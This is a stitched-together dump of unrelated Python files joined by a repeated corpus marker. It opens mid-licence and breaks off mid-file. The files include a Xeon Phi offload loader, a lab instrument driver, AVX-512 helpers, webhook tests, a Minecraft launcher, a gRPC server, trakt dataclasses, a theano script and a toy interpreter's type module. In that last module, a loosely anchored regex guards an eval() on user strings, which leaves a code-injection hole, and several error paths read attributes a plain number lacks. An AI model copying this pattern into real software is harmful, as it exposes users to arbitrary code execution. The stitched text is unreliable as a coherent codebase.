CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from __future__ import print_function import sys import os import platform import subprocess from pymic.offload_error import OffloadError from pymic._misc import _debug as debug from pymic._misc import _config as config from pymic._engine import pymic_library_load from pymic._engine import pymic_library_unload from pymic._engine import pymic_library_find_kernel # retrieve the installation path of the module pymic_dir = os.path.dirname(os.path.abspath(__file__)) class OffloadLibrary: """Manages loaded shared-object libraries with offload code on target devices. For each kernel of the library, the instance provides an attribute that can be used with invoke """ _library = None _tempfile = None _handle = None _device = None _device_id = None @staticmethod def _check_k1om(library): if platform.system() == 'Windows': # If we're running on a Windows machine, the .so # is expected to be a MIC native .so file. return True # Use readelf to detect the architecture flag of the .so # file to make sure we are only finding MIC native ones. p = subprocess.Popen(["readelf", '-h', library], stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = p.communicate() if not isinstance(out, str): out = str(out, 'ascii') # look for architecture flags # ('<unknown>' for older versions of binutils) return out.find('<unknown>: 0xb5') > 0 or out.find('Intel K1OM') > 0 @staticmethod def _find_library(library): if os.path.isabs(library) and OffloadLibrary._check_k1om(library): abspath = library else: path_list = [pymic_dir] path_list.extend(config._search_path.split(os.pathsep)) for path in path_list: debug(5, " looking for {0} in {1}", library, path) abspath = os.path.join(path, library) if (os.path.isfile(abspath) and OffloadLibrary._check_k1om(abspath)): break else: return return abspath def __init__(self, library, device=None): """Initialize this OffloadLibrary instance. This function is not to be called from outside pymic. 
""" # safety checks assert device is not None # bookkeeping self._library = library self._device = device self._device_id = device._map_dev_id() self.unloader = pymic_library_unload self._cache = {} # locate the library on the host file system debug(5, "searching for {0} in {1}", library, config._search_path) filename = OffloadLibrary._find_library(library) if filename is None: debug(5, "no suitable library found for '{0}'", library) raise OffloadError("Cannot find library '{0}' " "in PYMIC_LIBRARY_PATH".format(library)) # load the library and memorize handle debug(5, "loading '{0}' on device {1}", filename, self._device_id) self._handle, self._tempfile = pymic_library_load(self._device_id, filename) debug(5, "successfully loaded '{0}' on device {1} with handle 0x{2:x}", filename, self._device_id, self._handle) def __del__(self): # unload the library on the target device if self._handle is not None: self.unloader(self._device_id, self._handle, self._tempfile) def __repr__(self): return "OffloadLibrary('{0}'@0x{1:x}@mic:{2})".format(self._library, self._handle, self._device_id) def __str__(self): return "OffloadLibrary('{0}'@0x{1:x}@mic:{2})".format(self._library, self._handle, self._device_id) def __getattr__(self, attr): funcptr = self._cache.get(attr, None) if funcptr is None: funcptr = pymic_library_find_kernel(self._device_id, self._handle, attr) self._cache[attr] = funcptr return attr, funcptr, self._device, self
nilq/baby-python
python
import time
import logging
import numpy as np
# from scipy.optimize import brent
# from math import gcd
# from qcodes import Instrument
from qcodes.utils import validators as vals
# from qcodes.instrument.parameter import ManualParameter
from pycqed.analysis import analysis_toolbox as atools
# from pycqed.utilities.general import add_suffix_to_dict_keys
from pycqed.measurement import detector_functions as det
# from pycqed.measurement import composite_detector_functions as cdet
# from pycqed.measurement import mc_parameter_wrapper as pw
from pycqed.measurement import sweep_functions as swf
# from pycqed.measurement import awg_sweep_functions as awg_swf
# from pycqed.analysis import measurement_analysis as ma
# from pycqed.measurement.calibration_toolbox import mixer_carrier_cancellation_5014
# from pycqed.measurement.calibration_toolbox import mixer_carrier_cancellation_UHFQC
# from pycqed.measurement.calibration_toolbox import mixer_skewness_calibration_5014
# from pycqed.measurement.optimization import nelder_mead
from pycqed.analysis import analysis_toolbox as a_tools
# import pycqed.measurement.pulse_sequences.single_qubit_tek_seq_elts as sq
from copy import deepcopy, copy
import qcodes as qc
from qcodes.instrument.base import Instrument
from qcodes.instrument.parameter import ManualParameter
from pycqed.instrument_drivers.pq_parameters import InstrumentParameter


class Current_Source_ER_88027(Instrument):
    # Instruments will be a list of RemoteInstrument objects, which can be
    # given to a server on creation but not later on, so it needs to be
    # listed in shared_kwargs

    def __init__(self, name, Keithley_Vsource, Keithley_instr, **kwargs):
        super().__init__(name, **kwargs)
        self.keithley = Keithley_instr
        self.Vsource = Keithley_Vsource
        self.max_I = 10.  # A
        self.max_V = 6.  # V
        Keithley_Vsource.seti(10e-3)
        self.add_parameter('I',
                           set_cmd=self._set_I,
                           get_cmd=self._get_I,
                           label='Current',
                           vals=vals.Numbers(max_value=self.max_I),
                           unit='A')

    def _get_I(self):
        return convert_I(self.keithley.amplitude())

    def _set_I(self, value):
        self.Vsource.setv(value)
        time.sleep(0.250)

    def seti(self, value):
        self.I(value)

    def measurei(self):
        return self.I()

    def measureR(self):
        # placeholder: both branches currently return the same fixed resistance
        eps = 1e-4
        if abs(self.I() - 0) > eps:
            return 0.3
        else:
            return 0.3


def convert_I(dacV):
    # identity conversion: the Keithley reading is already in the desired unit
    return dacV
nilq/baby-python
python
def word2byte_array(array): assert len(array) == 32 res = [] for word in array: assert word >= 0 assert word <= 0xffff res.append(word & 0xff) res.append(word >> 8) return res def avx512_dwords(array): assert len(array) == 64 dwords = [] for i in range(0, 64, 4): b0 = array[i + 0] b1 = array[i + 1] b2 = array[i + 2] b3 = array[i + 3] dword = (b3 << 24) | (b2 << 16) | (b1 << 8) | b0 dwords.append(dword) return dwords indent = ' ' * 4 def avx512_const(array): dwords = avx512_dwords(array) lo = ', '.join('0x%08x' % v for v in dwords[:8]) hi = ', '.join('0x%08x' % v for v in dwords[8:]) return f"_mm512_setr_epi32(\n{indent}{lo},\n{indent}{hi}\n);" def avx512_var(name, array): dwords = avx512_dwords(array) lo = ', '.join('0x%08x' % v for v in dwords[:8]) hi = ', '.join('0x%08x' % v for v in dwords[8:]) return f"{indent}const __m512i {name} = _mm512_setr_epi32(\n" \ f"{indent}{indent}{lo},\n" \ f"{indent}{indent}{hi}\n" \ f"{indent});"
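# Example usage (added for illustration; the input words are arbitrary sample
# values, not taken from the original code): pack 32 16-bit words into 64
# little-endian bytes, then render them as AVX-512 constants.
if __name__ == '__main__':
    words = [i * 0x0101 for i in range(32)]  # 32 values within [0, 0xffff]
    bytes64 = word2byte_array(words)         # low byte first, then high byte
    assert len(bytes64) == 64
    print(avx512_const(bytes64))
    print(avx512_var('lookup', bytes64))     # 'lookup' is a sample variable name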
nilq/baby-python
python
#!/usr/bin/env python # Copyright 2016 The Kubernetes Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # pylint: disable=no-self-use """ To run these tests: $ pip install webtest nosegae $ nosetests --with-gae --gae-lib-root ~/google_appengine/ """ import json import unittest import webtest from google.appengine.ext import deferred from google.appengine.ext import testbed import handlers import main import models import secrets app = webtest.TestApp(main.app) class TestBase(unittest.TestCase): def init_stubs(self): self.testbed.init_memcache_stub() self.testbed.init_app_identity_stub() self.testbed.init_urlfetch_stub() self.testbed.init_blobstore_stub() self.testbed.init_datastore_v3_stub() self.testbed.init_taskqueue_stub() class AppTest(TestBase): def setUp(self): self.init_stubs() self.taskqueue = self.testbed.get_stub(testbed.TASKQUEUE_SERVICE_NAME) secrets.put('github_webhook_secret', 'some_secret', per_host=False) def get_response(self, event, body): if isinstance(body, dict): body = json.dumps(body) signature = handlers.make_signature(body) resp = app.post('/webhook', body, {'X-Github-Event': event, 'X-Hub-Signature': signature}) for task in self.taskqueue.get_filtered_tasks(): deferred.run(task.payload) return resp def test_webhook(self): self.get_response('test', {'action': 'blah'}) hooks = list(models.GithubWebhookRaw.query()) self.assertEqual(len(hooks), 1) self.assertIsNotNone(hooks[0].timestamp) def test_webhook_bad_sig(self): body = json.dumps({'action': 'blah'}) signature = handlers.make_signature(body + 'foo') app.post('/webhook', body, {'X-Github-Event': 'test', 'X-Hub-Signature': signature}, status=400) def test_webhook_missing_sig(self): app.post('/webhook', '{}', {'X-Github-Event': 'test'}, status=400) def test_webhook_unicode(self): self.get_response('test', {'action': u'blah\u03BA'}) def test_webhook_status(self): args = { 'name': 'owner/repo', 'sha': '1234', 'context': 'ci', 'state': 'success', 'target_url': 'http://example.com', 'description': 'passed the tests!', 'created_at': '2016-07-07T01:58:09Z', 'updated_at': '2016-07-07T02:03:12Z', } self.get_response('status', args) statuses = list(models.GHStatus.query_for_sha('owner/repo', '1234')) self.assertEqual(len(statuses), 1) status = statuses[0] args['repo'] = args.pop('name') for key, value in args.iteritems(): status_val = getattr(status, key) try: status_val = status_val.strftime('%Y-%m-%dT%H:%M:%SZ') except AttributeError: pass assert status_val == value, '%r != %r' % (getattr(status, key), value) PR_EVENT_BODY = { 'repository': {'full_name': 'test/test'}, 'pull_request': { 'number': 123, 'head': {'sha': 'cafe'}, 'updated_at': '2016-07-07T02:03:12Z', 'state': 'open', 'user': {'login': 'rmmh'}, 'assignees': [{'login': 'spxtr'}], 'title': 'test pr', }, 'action': 'opened', } def test_webhook_pr_open(self): body = json.dumps(self.PR_EVENT_BODY) self.get_response('pull_request', body) digest = models.GHIssueDigest.get('test/test', 123) self.assertTrue(digest.is_pr) self.assertTrue(digest.is_open) 
self.assertEqual(digest.involved, ['rmmh', 'spxtr']) self.assertEqual(digest.payload['title'], 'test pr') self.assertEqual(digest.payload['needs_rebase'], False) def test_webhook_pr_open_and_status(self): self.get_response('pull_request', self.PR_EVENT_BODY) self.get_response('status', { 'repository': self.PR_EVENT_BODY['repository'], 'name': self.PR_EVENT_BODY['repository']['full_name'], 'sha': self.PR_EVENT_BODY['pull_request']['head']['sha'], 'context': 'test-ci', 'state': 'success', 'target_url': 'example.com', 'description': 'woop!', 'created_at': '2016-07-07T01:58:09Z', 'updated_at': '2016-07-07T02:03:15Z', }) digest = models.GHIssueDigest.get('test/test', 123) self.assertEqual(digest.payload['status'], {'test-ci': ['success', 'example.com', 'woop!']})
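# The tests above use handlers.make_signature as a black box. For reference,
# GitHub's X-Hub-Signature header is the hex HMAC-SHA1 of the raw request body
# keyed by the shared webhook secret, so a compatible helper would look roughly
# like this sketch (illustrative only; the real implementation lives in
# handlers.py and its exact form is an assumption).
import hashlib
import hmac

def example_make_signature(body, secret='some_secret'):
    mac = hmac.new(secret, msg=body, digestmod=hashlib.sha1)
    return 'sha1=' + mac.hexdigest()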
nilq/baby-python
python
#!/usr/local/bin/python3 -u import minecraft_launcher_lib as mll import subprocess # Minecraft version mc_version = "1.18.1-rc2" # Asset index is same but without final revision asset_index = "1.18" # Your email, username and password below login = "yourEmailUsername" password = "seekritPasswordHere" # Get Minecraft directory mc_directory = mll.utils.get_minecraft_directory() libdir = mc_directory + "/libraries/" lwjgl3_libs = '/usr/local/share/lwjgl3/lwjgl.jar:' \ + '/usr/local/share/lwjgl3/lwjgl-openal.jar:' \ + '/usr/local/share/lwjgl3/lwjgl-opengl.jar:' \ + '/usr/local/share/lwjgl3/lwjgl-glfw.jar:' \ + '/usr/local/share/lwjgl3/lwjgl-stb.jar:' \ + '/usr/local/share/lwjgl3/lwjgl-tinyfd.jar:' \ + '/usr/local/share/lwjgl3/lwjgl-natives-openbsd.jar:' \ + '/usr/local/share/lwjgl3/lwjgl-opengl-natives-openbsd.jar:' \ + '/usr/local/share/lwjgl3/lwjgl-tinyfd-natives-openbsd.jar:' \ + '/usr/local/share/lwjgl3/lwjgl-stb-natives-openbsd.jar:' # Make sure the desired version of Minecraft is installed print("Installing version " + mc_version + " if needed... ", end="") mll.install.install_minecraft_version(mc_version,mc_directory) print("Done") # Login print("Logging in... ", end="") login_data = mll.account.login_user( login, password ) print("Done") # Useful figuring out new minecraft versions # Get Minecraft command #options = { # "username": login_data["selectedProfile"]["name"], # "uuid": login_data["selectedProfile"]["id"], # "token": login_data["accessToken"] #} #minecraft_command = mll.command.get_minecraft_command(mc_version,mc_directory,options) #print(minecraft_command) username = login_data["selectedProfile"]["name"] uuid = login_data["selectedProfile"]["id"] token = login_data["accessToken"] real_command = [ '/usr/local/jdk-17/bin/java', '-Xms2G', '-Xmx3G', '-Djava.library.path=/usr/local/share/lwjgl3/', '-Dminecraft.launcher.brand=minecraft-launcher-lib', '-Dminecraft.launcher.version=2.1', '-cp', libdir + 'com/mojang/blocklist/1.0.6/blocklist-1.0.6.jar:' + libdir + 'com/mojang/patchy/2.1.6/patchy-2.1.6.jar:' + libdir + 'com/github/oshi/oshi-core/5.8.2/oshi-core-5.8.2.jar:' + libdir + 'net/java/dev/jna/jna/5.9.0/jna-5.9.0.jar:' + libdir + 'net/java/dev/jna/jna-platform/5.9.0/jna-platform-5.9.0.jar:' + libdir + 'org/slf4j/slf4j-api/1.8.0-beta4/slf4j-api-1.8.0-beta4.jar:' + libdir + 'org/apache/logging/log4j/log4j-slf4j18-impl/2.14.1/log4j-slf4j18-impl-2.14.1.jar:' + libdir + 'com/ibm/icu/icu4j/69.1/icu4j-69.1.jar:' + libdir + 'com/mojang/javabridge/1.2.24/javabridge-1.2.24.jar:' + libdir + 'net/sf/jopt-simple/jopt-simple/5.0.4/jopt-simple-5.0.4.jar:' + libdir + 'io/netty/netty-all/4.1.68.Final/netty-all-4.1.68.Final.jar:' + libdir + 'com/google/guava/failureaccess/1.0.1/failureaccess-1.0.1.jar:' + libdir + 'com/google/guava/guava/31.0.1-jre/guava-31.0.1-jre.jar:' + libdir + 'org/apache/commons/commons-lang3/3.12.0/commons-lang3-3.12.0.jar:' + libdir + 'commons-io/commons-io/2.11.0/commons-io-2.11.0.jar:' + libdir + 'commons-codec/commons-codec/1.15/commons-codec-1.15.jar:' + libdir + 'com/mojang/brigadier/1.0.18/brigadier-1.0.18.jar:' + libdir + 'com/mojang/datafixerupper/4.0.26/datafixerupper-4.0.26.jar:' + libdir + 'com/google/code/gson/gson/2.8.8/gson-2.8.8.jar:' + libdir + 'com/mojang/authlib/3.2.38/authlib-3.2.38.jar:' + libdir + 'org/apache/commons/commons-compress/1.21/commons-compress-1.21.jar:' + libdir + 'org/apache/httpcomponents/httpclient/4.5.13/httpclient-4.5.13.jar:' + libdir + 'commons-logging/commons-logging/1.2/commons-logging-1.2.jar:' + libdir + 
'org/apache/httpcomponents/httpcore/4.4.14/httpcore-4.4.14.jar:' + libdir + 'it/unimi/dsi/fastutil/8.5.6/fastutil-8.5.6.jar:' + libdir + 'org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.jar:' + libdir + 'org/apache/logging/log4j/log4j-core/2.14.1/log4j-core-2.14.1.jar:' + lwjgl3_libs + libdir + 'com/mojang/text2speech/1.11.3/text2speech-1.11.3.jar:' + mc_directory + '/versions/' + mc_version + '/' + mc_version + '.jar', 'net.minecraft.client.main.Main', '--username', username, '--version', mc_version, '--gameDir', mc_directory, '--assetsDir', mc_directory + '/assets', '--assetIndex', asset_index, '--uuid', uuid, '--accessToken', token, '--userType', 'mojang', '--versionType', 'snapshot' ] # Start Minecraft subprocess.call(real_command)
nilq/baby-python
python
from concurrent import futures import logging import grpc import app_pb2 import app_pb2_grpc class Greeter(app_pb2_grpc.GreeterServicer): def SayHello(self, request, context): for key, value in context.invocation_metadata(): print('Received initial metadata: key=%s value=%s' % (key, value)) return app_pb2.HelloReply(message='Hello, %s!' % request.name) def SayHelloCS(self, requests, context): names = [] for request in requests: names.append(request.name) return app_pb2.HelloReply(message=f"Hello {', '.join(names)}") def SayHelloSS(self, request, context): yield app_pb2.HelloReply(message='Hello, %s!' % request.name) def SayHelloBI(self, requests, context): context.set_trailing_metadata(( ('checksum-bin', b'I agree'), ('retry', 'false'), )) for request in requests: yield app_pb2.HelloReply(message='Hello, %s!' % request.name) def SayHelloBytes(self, request, context): name = request.name.decode("utf-8") return app_pb2.HelloReply(message=f"Hello, {name}!") def serve(): server = grpc.server(futures.ThreadPoolExecutor(max_workers=10)) app_pb2_grpc.add_GreeterServicer_to_server(Greeter(), server) server.add_insecure_port('[::]:50051') server.start() server.wait_for_termination() if __name__ == '__main__': logging.basicConfig() serve()
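# A matching client, sketched for illustration. It assumes the generated stub
# is named GreeterStub and the request message is HelloRequest with a single
# `name` field, which follows the server code above; run it in a second
# process while serve() is running.
def run_client():
    with grpc.insecure_channel('localhost:50051') as channel:
        stub = app_pb2_grpc.GreeterStub(channel)
        # unary-unary call, with metadata the server echoes to stdout
        reply = stub.SayHello(app_pb2.HelloRequest(name='world'),
                              metadata=(('client-id', 'demo'),))
        print(reply.message)
        # client-streaming call fed by an iterator of requests
        names = (app_pb2.HelloRequest(name=n) for n in ('alice', 'bob'))
        print(stub.SayHelloCS(names).message)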
nilq/baby-python
python
# flake8: noqa: F401 from dataclasses import dataclass, field from datetime import datetime from typing import Any, Dict, List, Optional from trakt.core.models import ( Comment, Episode, Movie, Person, Season, Show, TraktList, User, ) from trakt.core.paths.response_structs.movie_structs import ( AnticipatedMovie, BoxOffice, MovieCastCredit, MovieCheckin, MovieCredits, MovieCrewCredit, MovieCrewCredits, MoviePremiere, MovieRelease, MovieScrobble, MovieStats, MovieTranslation, MovieWithStats, Sharing, TrendingMovie, UpdatedMovie, ) from trakt.core.paths.response_structs.show_structs import ( AnticipatedShow, ShowCollectionProgress, ShowCredits, ShowStats, ShowTranslation, ShowWatchedProgress, ShowWithStats, TrendingShow, UpdatedShow, ) @dataclass class EpisodePremiere: first_aired: datetime episode: Episode show: Show @dataclass class Country: name: str code: str @dataclass class Certification: name: str slug: str description: str @dataclass class Genre: name: str slug: str @dataclass class Language: name: str code: str @dataclass class ListResponse: like_count: int comment_count: int list: TraktList user: User @dataclass class EpisodeCheckin: id: int watched_at: str sharing: Sharing episode: Episode show: Show @dataclass class Alias: title: str country: str @dataclass class CastMember: character: str person: Person @dataclass class CrewMember: job: str person: Person @dataclass class CrewList: production: List[CrewMember] = field(default_factory=list) art: List[CrewMember] = field(default_factory=list) crew: List[CrewMember] = field(default_factory=list) costume_make_up: List[CrewMember] = field(default_factory=list) directing: List[CrewMember] = field(default_factory=list) writing: List[CrewMember] = field(default_factory=list) sound: List[CrewMember] = field(default_factory=list) camera: List[CrewMember] = field(default_factory=list) @dataclass class CastCrewList: cast: List[CastMember] crew: CrewList @dataclass class RatingsSummary: rating: float votes: int distribution: Dict[Any, Any] @dataclass class Network: name: str @dataclass class CommentResponse: id: int created_at: datetime comment: str spoiler: bool review: bool replies: int likes: int user: User parent_id: Optional[int] = None user_rating: Optional[int] = None updated_at: Optional[datetime] = None sharing: Optional[Sharing] = None @dataclass class CommentItemOnly: type: str list: Optional[TraktList] = None movie: Optional[Movie] = None episode: Optional[Episode] = None show: Optional[Show] = None season: Optional[Season] = None @dataclass class CommentAndItem: type: str comment: Comment list: Optional[TraktList] = None movie: Optional[Movie] = None episode: Optional[Episode] = None show: Optional[Show] = None season: Optional[Season] = None @dataclass class SearchResult: type: str score: Optional[float] = None movie: Optional[Movie] = None list: Optional[TraktList] = None person: Optional[Person] = None episode: Optional[Episode] = None show: Optional[Show] = None @dataclass class EpisodeScrobble: id: int action: str progress: float sharing: Sharing episode: Episode show: Show @dataclass class SeasonEpisodeStats: watchers: int plays: int collectors: int collected_episodes: int comments: int lists: int votes: int @dataclass class EpisodeTranslation: title: str overview: str language: str @dataclass class CommentLiker: liked_at: datetime user: User
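# A small construction example for the dataclasses above (values are made up
# for illustration). Only structs whose fields are fully visible in this
# module are used, so nothing is assumed about trakt.core.models.
if __name__ == '__main__':
    genre = Genre(name='Science Fiction', slug='science-fiction')
    country = Country(name='United States', code='us')
    translation = EpisodeTranslation(title='Pilot', overview='First episode.', language='en')
    print(genre, country, translation)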
nilq/baby-python
python
try:
    import cPickle as pickle  # Python 2
except ImportError:
    import pickle  # Python 3
import theano_funcs
import utils
import vgg16

from lasagne.layers import set_all_param_values
from tqdm import tqdm
from os.path import join


def warp_images():
    print('building model')
    layers = vgg16.build_model((None, 3, 227, 227))

    batch_size = 32
    infer_dir = join('data', 'inference')
    weightsfile = join('weights', 'weights.pickle')
    with open(weightsfile, 'rb') as f:
        param_values = pickle.load(f)
    set_all_param_values(layers['trans'], param_values)

    pretrainfile = join('weights', 'vgg16.pkl')
    with open(pretrainfile, 'rb') as f:
        data = pickle.load(f)

    mean = data['mean value']

    image_fpaths = [
        ('Cars_013b.png', 'Cars_009b.png'),
        ('060_0071.png', '060_0000.png'),
        ('246_0052.png', '246_0042.png')
    ]

    print('compiling theano functions for inference')
    # Ceiling division; // keeps the batch count an int on Python 3 as well.
    num_infer_idx = (len(image_fpaths) + batch_size - 1) // batch_size
    infer_func = theano_funcs.create_infer_func(layers)
    infer_iter = utils.get_batch_idx(len(image_fpaths), batch_size)

    for i, idx in tqdm(infer_iter, total=num_infer_idx, leave=False):
        Xa, Xb = utils.prepare_batch(image_fpaths[idx], mean)
        M = infer_func(Xa, Xb)
        utils.plot_samples(Xa, Xb, M, mean,
                           prefix=join(infer_dir, 'infer_%d' % i))


if __name__ == '__main__':
    warp_images()
nilq/baby-python
python
from copy import deepcopy from re import match from .error import throw __all__ = [ 'Type', 'ModuleType', 'BooleanType', 'NoneType', 'NumberType', 'StringType', 'TupleType', 'ListType', 'NameType', 'SliceType', 'ArgType', 'ArgumentsType', 'FunctionType', 'BuiltinFunctionType', 'true', 'false', 'none', 'RESERVED', 'DEFAULT_ENV', 'CONSTRUCTOR_TYPES', ] class Type: pass class ModuleType(Type): # ----- Initialization Methods ----- # def __init__(self, env, /): self.env = deepcopy(env) # ----- Informal Methods ----- # def __repr__(self, /): return f'Module({self.env})' class BooleanType(Type): # ----- Initialization Methods ----- # def __init__(self, value, /): self.value = value # ----- Informal Methods ----- # def __repr__(self, /): return 'true' if self.value else 'false' # ----- Transformation Methods ----- # def __hash__(self, /): return hash(self.value) def __bool__(self, /): return self.value def __neg__(self, /): return NumberType(-self.value) def __pos__(self, /): return NumberType(+self.value) def __invert__(self, /): return BooleanType(not self.value) # ----- Bitwise Calculation Methods ----- # def __and__(self, other, /): if isinstance(other, NumberType): return BooleanType(self.value & other.value) else: return NotImplemented def __or__(self, other, /): if isinstance(other, NumberType): return BooleanType(self.value | other.value) else: return NotImplemented def __xor__(self, other, /): if isinstance(other, NumberType): return BooleanType(self.value ^ other.value) else: return NotImplemented # ----- Inner Operations ----- # @classmethod def construct(cls, obj=None, /, *, env): if obj is None: return cls(False) else: return cls(True if obj.eval(env=env) else False) class NoneType(Type): # ----- Initialization Methods ----- # def __init__(self, /): pass # ----- Transformation Methods ----- # def __hash__(self, /): return hash(None) def __bool__(self, /): return False # ----- Informal Methods ----- # def __repr__(self, /): return 'none' class NumberType(Type): # ----- Initialization Methods ----- # def __init__(self, value, /): self.value = value # ----- Informal Methods ----- # def __repr__(self, /): if self.value % 1 == 0: return f'{self.value:.0f}' else: return f'{self.value}' # ----- Transformation Methods ----- # def __hash__(self, /): return hash(self.value) def __bool__(self, /): return True if self.value else False def __neg__(self, /): return NumberType(-self.value) def __pos__(self, /): return self def __invert__(self, /): if self.value % 1 == 0: return NumberType(~int(self.value)) else: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be inverted', line=True) # ----- Comparison Methods ----- # def __lt__(self, other, /): if isinstance(other, NumberType): return BooleanType(self.value < other.value) else: return NotImplemented def __le__(self, other, /): if isinstance(other, NumberType): return BooleanType(self.value <= other.value) else: return NotImplemented def __eq__(self, other, /): if isinstance(other, NumberType): return BooleanType(self.value == other.value) else: return NotImplemented def __ne__(self, other, /): if isinstance(other, NumberType): return BooleanType(self.value != other.value) else: return NotImplemented def __gt__(self, other, /): if isinstance(other, NumberType): return BooleanType(self.value > other.value) else: return NotImplemented def __ge__(self, other, /): if isinstance(other, NumberType): return BooleanType(self.value >= other.value) else: return NotImplemented # ----- Calculation Methods ----- # def __add__(self, other, 
/): if isinstance(other, NumberType): return NumberType(self.value + other.value) else: return NotImplemented def __sub__(self, other, /): if isinstance(other, NumberType): return NumberType(self.value - other.value) else: return NotImplemented def __mul__(self, other, /): if isinstance(other, NumberType): return NumberType(self.value * other.value) else: return NotImplemented def __truediv__(self, other, /): if isinstance(other, NumberType): return NumberType(self.value / other.value) else: return NotImplemented def __floordiv__(self, other, /): if isinstance(other, NumberType): return NumberType(self.value // other.value) else: return NotImplemented def __mod__(self, other, /): if isinstance(other, NumberType): return NumberType(self.value % other.value) else: return NotImplemented def __pow__(self, other, /): if isinstance(other, NumberType): return NumberType(self.value ** other.value) else: return NotImplemented def __lshift__(self, other, /): if isinstance(other, NumberType): if self.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in << operations', line=True) if other.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in << operations', line=True) return NumberType(int(self.value) << int(other.value)) else: return NotImplemented def __rshift__(self, other, /): if isinstance(other, NumberType): if self.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in >> operations', line=True) if other.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in >> operations', line=True) return NumberType(int(self.value) >> int(other.value)) else: return NotImplemented # ----- Bitwise Calculation Methods ----- # def __and__(self, other, /): if isinstance(other, NumberType): if self.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in & operations', line=True) if other.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in & operations', line=True) return NumberType(int(self.value) & int(other.value)) else: return NotImplemented def __xor__(self, other, /): if isinstance(other, NumberType): if self.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in ^ operations', line=True) if other.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in ^ operations', line=True) return NumberType(int(self.value) ^ int(other.value)) else: return NotImplemented def __or__(self, other, /): if isinstance(other, NumberType): if self.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in | operations', line=True) if other.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in | operations', line=True) return NumberType(int(self.value) | int(other.value)) else: return NotImplemented # ----- Inner Operations ----- # @classmethod def construct(cls, obj=None, /, *, env): if obj is None: return cls(0) value = obj.eval(env=env) if isinstance(value, BooleanType): return cls(+value.value) elif isinstance(value, NumberType): return cls(value.value) elif isinstance(value, StringType): if match(r'^\d+(\.(\d+)?)?([Ee][+\-]?\d+)?' 
r'|(\d+)?\.\d+([Ee][+\-]?\d+)?$', value.value): return cls(eval(value.value)) else: throw(obj.info, obj.token, 'ValueError', f"could not convert string to float: {value.value!r}", line=True) else: throw(obj.info, obj.token, 'ValueError', f"Number() argument must be a string or a number, " f"not '{type(value).__name__}'", line=True) class StringType(Type): # ----- Initialization Methods ----- # def __init__(self, value, /): self.value = value # ----- Informal Methods ----- # def __repr__(self, /): return f'{self.value!r}' def __str__(self, /): return self.value # ----- Transformation Methods ----- # def __hash__(self, /): return hash(self.value) def __bool__(self, /): return True if self.value else False # ----- Iterable Methods ----- # def __len__(self, /): return len(self.value) def __getitem__(self, key, /): if isinstance(key, int): return self.value[key] else: slice = [] for item in (key.start, key.stop, key.step): if isinstance(item, NumberType): slice.append(int(item.value)) else: slice.append(None) start, stop, step = slice return self.value[start:stop:step] def __iter__(self, /): return iter(self.value) def __contains__(self, item, /): return item.value in self.value # ----- Calculation Methods ----- # def __add__(self, other, /): if isinstance(other, StringType): return StringType(self.value + other.value) else: return NotImplemented def __mul__(self, other, /): if isinstance(other, StringType): return StringType(self.value * other.value) else: return NotImplemented def __rmul__(self, other, /): if isinstance(other, StringType): return StringType(self.value * other.value) else: return NotImplemented # ----- Inner Operations ----- # @classmethod def construct(cls, obj=None, /, *, env): return cls('' if obj is None else f'{obj.eval(env=env)}') class TupleType(Type): # ----- Initialization Methods ----- # def __init__(self, values, /): self.values = values # ----- Informal Methods ----- # def __repr__(self, /): return f'{self.values}' # ----- Transformation Methods ----- # def __bool__(self, /): return True if self.values else False # ----- Iterable Methods ----- # def __len__(self, /): return len(self.values) def __getitem__(self, key, /): if isinstance(key, int): return self.values[key] else: slice = [] for item in (key.start, key.stop, key.step): if isinstance(item, NumberType): slice.append(int(item.value)) else: slice.append(None) start, stop, step = slice return self.values[start:stop:step] def __iter__(self, /): return iter(self.values) def __contains__(self, item, /): return item in self.values # ----- Calculation Methods ----- # def __add__(self, other, /): if isinstance(other, TupleType): return TupleType(self.values + other.values) else: return NotImplemented def __mul__(self, other, /): if isinstance(other, TupleType): return TupleType(self.values * other.values) else: return NotImplemented def __rmul__(self, other, /): if isinstance(other, TupleType): return TupleType(self.values * other.values) else: return NotImplemented # ----- Inner Operations ----- # @classmethod def construct(cls, obj=None, /, *, env): return cls(() if obj is None else tuple(obj.eval(env=env))) class ListType(Type): # ----- Initialization Methods ----- # def __init__(self, values, /): self.values = values # ----- Informal Methods ----- # def __repr__(self, /): return f'{self.values}' # ----- Transformation Methods ----- # def __bool__(self, /): return True if self.values else False # ----- Iterable Methods ----- # def __len__(self, /): return len(self.values) def __getitem__(self, key, /): if 
